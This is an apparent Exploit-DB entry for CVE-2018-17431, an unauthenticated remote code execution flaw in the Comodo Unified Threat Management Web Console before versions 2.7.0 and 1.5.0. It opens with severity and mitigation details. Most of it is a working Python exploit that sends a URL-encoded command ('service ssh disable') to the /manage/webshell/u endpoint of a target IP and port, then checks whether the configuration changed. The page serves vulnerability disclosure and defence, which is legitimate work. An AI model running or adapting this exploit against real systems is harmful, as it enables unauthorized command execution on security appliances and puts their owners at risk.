Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution

vendor:

Comodo Unified Threat Management Web Console

by:

Milad Fadavvi

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Comodo Unified Threat Management Web Console

Affected Version From: Releases before 2.7.0 & 1.5.0

Affected Version To: Releases before 2.7.0 & 1.5.0

Patch Exists: YES

Related CWE: CVE-2018-17431

CPE: a:comodo:unified_threat_management_web_console

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows, Kali

2018

Comodo Unified Threat Management Web Console 2.7.0 – Remote Code Execution

A vulnerability in Comodo Unified Threat Management (UTM) Web Console versions before 2.7.0 and 1.5.0 allows an unauthenticated attacker to execute arbitrary code on the system. This is due to the lack of authentication for the webshell/u endpoint, which allows an attacker to send a crafted request to execute arbitrary code on the system. The attacker can send a crafted request to the webshell/u endpoint to execute arbitrary code on the system.

Mitigation:

Upgrade to version 2.7.0 or 1.5.0 of Comodo UTM Web Console

Source

Exploit-DB raw data:

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0 
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8 

import requests

def RndInt(Lenght):
    from random import choice
    from string import digits

    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)

if __name__ == "__main__":

    IP = input("IP: ")
    Port = input("Port: ")

    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
    '''For more info about command try to read manual of spesefic version of Comodo UTM and 
       exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
     '''

    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)
    
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
    exit(0)